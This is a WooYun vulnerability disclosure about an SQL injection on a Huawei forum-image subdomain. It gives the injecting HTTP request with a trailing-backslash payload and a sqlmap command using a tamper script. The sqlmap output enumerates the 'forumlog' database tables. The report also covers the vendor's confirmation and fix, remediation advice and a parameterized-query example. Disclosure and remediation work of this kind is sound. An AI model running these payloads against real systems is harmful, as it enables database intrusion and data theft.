
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0150541

Title: SQL injection in a Huawei subdomain

Vendor: Huawei Technologies Co., Ltd.

Author: Jannock

Submitted: 2015-10-30 10:45

Fixed: 2015-12-14 11:26

Published: 2015-12-14 11:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-30: Details sent to the vendor, awaiting vendor response
2015-10-30: Vendor confirmed; details visible to the vendor only
2015-11-09: Details opened to core white hats and domain experts
2015-11-19: Details opened to regular white hats
2015-11-29: Details opened to intern white hats
2015-12-14: Details opened to the public

Brief description:

SQL injection in a Huawei subdomain

Detailed description:

GET /cn/forumimage/index.php?app=stat&mod=VideoStat&act=insertRecord&uid=-1&targetId=0&targetTitle=gfhgfh&type=paper\&targetAction=,1,0,if((1=1 *),1,1),0,0,0,0,%23&source=windows&action=trace HTTP/1.1
Host: xinsheng-image.huawei.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-HK,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: 192.168.1.1
Cookie: _ga=GA1.2.393988089.1446012893; s_fid=079C1ABA72D5B6C4-13A758BCA62CD20D; __utma=92496004.393988089.1446012893.1446012902.1446012902.1; __utmz=92496004.1446012902.1.1.utmcsr=huawei.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/; bfdid=b0605254007bf9520001d2440014c24056307fe8; HWFORUM_SESSION=jnms6co53phe1idna2jbhvdos1; forum-guest=true; TS_think_language=zh-cn
Connection: keep-alive


The classic escaping mistake: a trailing backslash. The `type` parameter is sent as `paper\`. The application's filter handles quotes but not backslashes, so once the value is placed in the statement as `'paper\'` the backslash escapes the closing quote and MySQL reads the string as running on to the next quote, which is the one meant to open `targetAction`. Everything in `targetAction` (`,1,0,if((1=1 *),1,1),0,0,0,0,#`) therefore lands outside any string literal and is parsed as SQL, with the `#` commenting out the rest of the line. The `*` is sqlmap's custom injection marker: the request is saved as 1.txt and passed with -r, and sqlmap substitutes its payloads at that position.

Proof of vulnerability:

python sqlmap.py -r 1.txt --dbms=mysql --technique=E --tamper space2mysqlblank -D forumlog --tables
sqlmap 1.0-dev-nongit-20150928 http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility t
pplicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this pr
[*] starting at 10:32:20
[10:32:20] [INFO] parsing HTTP request from '1.txt'
[10:32:20] [INFO] loading tamper script 'space2mysqlblank'
[10:32:20] [WARNING] tamper script 'space2mysqlblank' is only meant to be run against MySQL
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:32:21] [INFO] testing connection to the target URL
[10:32:22] [INFO] heuristics detected web page charset 'ascii'
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yo
want to merge them in futher requests? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://xinsheng-image.huawei.com:80/cn/forumimage/index.php?app=stat&mod=VideoStat&act=insertRecord&uid=-1&targetId=0&targetT
type=paper\&targetAction=,1,0,if((1=1 ) AND (SELECT 9940 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(9940=9940,1))),0x7170627871
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6564=6564),1,1),0,0,0,0,#&source=windows&action=trace
---
[10:32:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:32:23] [INFO] testing MySQL
[10:32:24] [INFO] confirming MySQL
[10:32:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.13, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
[10:32:24] [INFO] fetching tables for database: 'forumlog'
[10:32:24] [INFO] the SQL query used returns 53 entries
[10:32:24] [INFO] retrieved: ts_app_login_log
[10:32:25] [INFO] retrieved: ts_forum_log_2015_10
[10:32:25] [INFO] retrieved: ts_forum_viewcount
[10:32:25] [INFO] retrieved: ts_online
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_app
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_user
[10:32:26] [INFO] retrieved: ts_online_action_daily_stat_user_2008
[10:32:27] [INFO] retrieved: ts_online_action_daily_stat_user_2009
[10:32:27] [INFO] retrieved: ts_online_action_daily_stat_user_2010
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2011
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2012
[10:32:28] [INFO] retrieved: ts_online_action_daily_stat_user_2013
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_2014
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_pv
[10:32:29] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2011
[10:32:30] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2012
[10:32:30] [INFO] retrieved: ts_online_action_daily_stat_user_pv_2014
[10:32:31] [INFO] retrieved: ts_online_action_map
[10:32:31] [INFO] retrieved: ts_online_data
[10:32:31] [INFO] retrieved: ts_online_logs
[10:32:32] [INFO] retrieved: ts_online_logs_2012_06_bk
[10:32:32] [INFO] retrieved: ts_online_logs_2012_12
[10:32:32] [INFO] retrieved: ts_online_logs_2014_01
[10:32:33] [INFO] retrieved: ts_online_logs_2014_02
[10:32:33] [INFO] retrieved: ts_online_logs_2014_03
[10:32:33] [INFO] retrieved: ts_online_logs_2014_04
[10:32:34] [INFO] retrieved: ts_online_logs_2014_05
[10:32:34] [INFO] retrieved: ts_online_logs_2014_06
[10:32:35] [INFO] retrieved: ts_online_logs_2014_07
[10:32:35] [INFO] retrieved: ts_online_logs_2014_08
[10:32:36] [INFO] retrieved: ts_online_logs_2014_09
[10:32:36] [INFO] retrieved: ts_online_logs_2014_10
[10:32:36] [INFO] retrieved: ts_online_logs_2014_11
[10:32:37] [INFO] retrieved: ts_online_logs_2014_12
[10:32:37] [INFO] retrieved: ts_online_logs_2015_01
[10:32:37] [INFO] retrieved: ts_online_logs_2015_02
[10:32:38] [INFO] retrieved: ts_online_logs_2015_03
[10:32:38] [INFO] retrieved: ts_online_logs_2015_04
[10:32:38] [INFO] retrieved: ts_online_logs_2015_05
[10:32:39] [INFO] retrieved: ts_online_logs_2015_06
[10:32:39] [INFO] retrieved: ts_online_logs_2015_07
[10:32:40] [INFO] retrieved: ts_online_logs_2015_08
[10:32:40] [INFO] retrieved: ts_online_logs_2015_09
[10:32:40] [INFO] retrieved: ts_online_logs_2015_10
[10:32:41] [INFO] retrieved: ts_online_schedule_stat
[10:32:41] [INFO] retrieved: ts_online_stats
[10:32:41] [INFO] retrieved: ts_online_user_depart
[10:32:42] [INFO] retrieved: ts_online_user_frequency_daily
[10:32:42] [INFO] retrieved: ts_online_user_frequency_month
[10:32:42] [INFO] retrieved: ts_online_user_frequency_week
[10:32:43] [INFO] retrieved: ts_online_user_frequency_year
[10:32:43] [INFO] retrieved: ts_online_widget
[10:32:44] [INFO] retrieved: video_online_logs
Database: forumlog
[53 tables]
+------------------------------------------+
| ts_app_login_log |
| ts_forum_log_2015_10 |
| ts_forum_viewcount |
| ts_online |
| ts_online_action_daily_stat_app |
| ts_online_action_daily_stat_user |
| ts_online_action_daily_stat_user_2008 |
| ts_online_action_daily_stat_user_2009 |
| ts_online_action_daily_stat_user_2010 |
| ts_online_action_daily_stat_user_2011 |
| ts_online_action_daily_stat_user_2012 |
| ts_online_action_daily_stat_user_2013 |
| ts_online_action_daily_stat_user_2014 |
| ts_online_action_daily_stat_user_pv |
| ts_online_action_daily_stat_user_pv_2011 |
| ts_online_action_daily_stat_user_pv_2012 |
| ts_online_action_daily_stat_user_pv_2014 |
| ts_online_action_map |
| ts_online_data |
| ts_online_logs |
| ts_online_logs_2012_06_bk |
| ts_online_logs_2012_12 |
| ts_online_logs_2014_01 |
| ts_online_logs_2014_02 |
| ts_online_logs_2014_03 |
| ts_online_logs_2014_04 |
| ts_online_logs_2014_05 |
| ts_online_logs_2014_06 |
| ts_online_logs_2014_07 |
| ts_online_logs_2014_08 |
| ts_online_logs_2014_09 |
| ts_online_logs_2014_10 |
| ts_online_logs_2014_11 |
| ts_online_logs_2014_12 |
| ts_online_logs_2015_01 |
| ts_online_logs_2015_02 |
| ts_online_logs_2015_03 |
| ts_online_logs_2015_04 |
| ts_online_logs_2015_05 |
| ts_online_logs_2015_06 |
| ts_online_logs_2015_07 |
| ts_online_logs_2015_08 |
| ts_online_logs_2015_09 |
| ts_online_logs_2015_10 |
| ts_online_schedule_stat |
| ts_online_stats |
| ts_online_user_depart |
| ts_online_user_frequency_daily |
| ts_online_user_frequency_month |
| ts_online_user_frequency_week |
| ts_online_user_frequency_year |
| ts_online_widget |
| video_online_logs |
+------------------------------------------+

Remediation:

Escape properly (backslashes as well as quotes) before building SQL, or better, use parameterized queries (prepared statements) so that user-supplied values are never parsed as part of the statement.
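Added example, not code from the application or from the report author, illustrating both the escaping mistake described in the detailed description and the remediation above. The INSERT statement, the table name `video_stat` and its column list are assumptions; the sample parameters are constructed from the query string in the report (with sqlmap's `*` marker removed). The scanner splits the statement into string literals the way MySQL's lexer does, which shows where the trailing backslash moves the string boundary; the last function shows the same data stored intact through placeholders (sqlite3 is used only so it runs offline).

```python
import sqlite3

COLS = ["uid", "targetId", "targetTitle", "type", "targetAction", "source"]

# Constructed sample input mirroring the request in the report
# (sqlmap's '*' marker removed, the trailing backslash on type kept).
PARAMS = {
    "uid": "-1",
    "targetId": "0",
    "targetTitle": "gfhgfh",
    "type": "paper\\",
    "targetAction": ",1,0,if((1=1),1,1),0,0,0,0,#",
    "source": "windows",
}


def escape_quotes_only(value):
    """The broken filter (assumed): quotes are escaped, backslashes are not."""
    return value.replace("'", "\\'")


def escape_backslash_and_quote(value):
    """Correct escaping for a MySQL single-quoted literal: backslash first, then quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_insert(params, escape):
    """Hypothetical string-concatenated INSERT, the pattern behind this class of bug."""
    values = ",".join("'" + escape(params[c]) + "'" for c in COLS)
    return "INSERT INTO video_stat (%s) VALUES (%s)" % (",".join(COLS), values)


def literals_as_mysql_sees(sql):
    """Scan single-quoted literals the way MySQL's lexer does: a backslash
    escapes the next character, '' inside a literal is one quote, and '#'
    outside a literal starts a comment running to end of line.
    Returns (literal values, SQL text outside any literal, comment text)."""
    literals, outside, comment = [], [], ""
    i, n = 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":
            j, buf = i + 1, []
            while j < n:
                c = sql[j]
                if c == "\\" and j + 1 < n:
                    buf.append(sql[j + 1])
                    j += 2
                elif c == "'" and j + 1 < n and sql[j + 1] == "'":
                    buf.append("'")
                    j += 2
                elif c == "'":
                    break
                else:
                    buf.append(c)
                    j += 1
            literals.append("".join(buf))
            i = j + 1
        elif ch == "#":
            comment = sql[i:].split("\n", 1)[0]
            i += len(comment)
        else:
            outside.append(ch)
            i += 1
    return literals, "".join(outside), comment


def insert_parameterized(params):
    """The fix: placeholders carry values out of band, so a trailing backslash
    or a quote in the data can never change the shape of the statement.
    sqlite3 is used only so this runs offline; MySQL drivers take ? / %s the same way."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE video_stat (uid, targetId, targetTitle, type, targetAction, source)")
    con.execute(
        "INSERT INTO video_stat (%s) VALUES (?,?,?,?,?,?)" % ",".join(COLS),
        [params[c] for c in COLS],
    )
    row = con.execute("SELECT type, targetAction FROM video_stat").fetchone()
    con.close()
    return row


if __name__ == "__main__":
    for name, esc in (("quotes only", escape_quotes_only),
                      ("backslash+quote", escape_backslash_and_quote)):
        lits, outside, comment = literals_as_mysql_sees(build_insert(PARAMS, esc))
        print("%-16s literals=%d outside=%r comment=%r" % (name, len(lits), outside, comment))
    print("parameterized:", insert_parameterized(PARAMS))
```

With the quotes-only filter the scanner finds only four literals, the fourth being `paper',`, and the whole of `targetAction` (including the `if(...)` expression) sits outside any literal, with `#` swallowing the closing quote and the remaining columns. Escaping the backslash as well yields six literals and no raw SQL from the input; the parameterized version needs no escaping at all.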

Copyright notice: when republishing, please credit the source: Jannock@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-10-30 11:25

Vendor reply:

Thanks, bro. The business unit has been notified for urgent remediation. The data is statistical data.

Latest status:

None yet


Vulnerability feedback:

Comments

  1. 2015-10-30 10:47 | loli, certified white hat (regular white hat | Rank: 623 | vulns: 57 | Every man has a masseuse No. 88 named Xiaohong living in his heart.)

    Hurry and farm vulns while the Huawei folks are in a meeting...

  2. 2015-10-30 10:53 | hecate (regular white hat | Rank: 569 | vulns: 89 | ® Senior Security Engineer | WooYun certified √)

    Front row

  3. 2015-10-30 13:14 | rasca1 (intern white hat | Rank: 53 | vulns: 16 | just a noob)

    Front row

  4. 2015-10-30 14:33 | 猪猪侠, certified white hat (core white hat | Rank: 3650 | vulns: 282 | You already have so many super lollipops, what do you want freedom for?)

    They're holding a salon